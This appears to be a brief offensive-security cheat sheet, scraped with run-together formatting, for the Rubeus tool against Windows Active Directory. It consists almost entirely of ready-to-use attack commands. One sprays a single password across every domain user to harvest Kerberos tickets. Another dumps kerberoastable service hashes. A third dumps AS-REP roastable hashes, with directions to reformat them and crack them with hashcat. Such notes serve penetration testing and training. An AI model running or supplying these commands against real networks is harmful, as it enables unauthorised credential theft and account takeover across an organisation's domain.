https://github.com/GhostPack/Rubeus
Password Spraying
Rubeus.exe brute /password:myPassword /noticketSpray a password against all users in current domain and return the
.kirbi
TGT of users that use this password.
Kerberoasting
Rubeus.exe kerberoastDump Kerberos hashes of kerberoastable users (same as GetUserSPNs.py but on the target machine).
AS_REProasting
Rubeus.exe asreproastDump Kerberos hashes of AS_REProastable users. (Then Insert
23$
after$krb5asrep$
and usehashcat -m 18200
).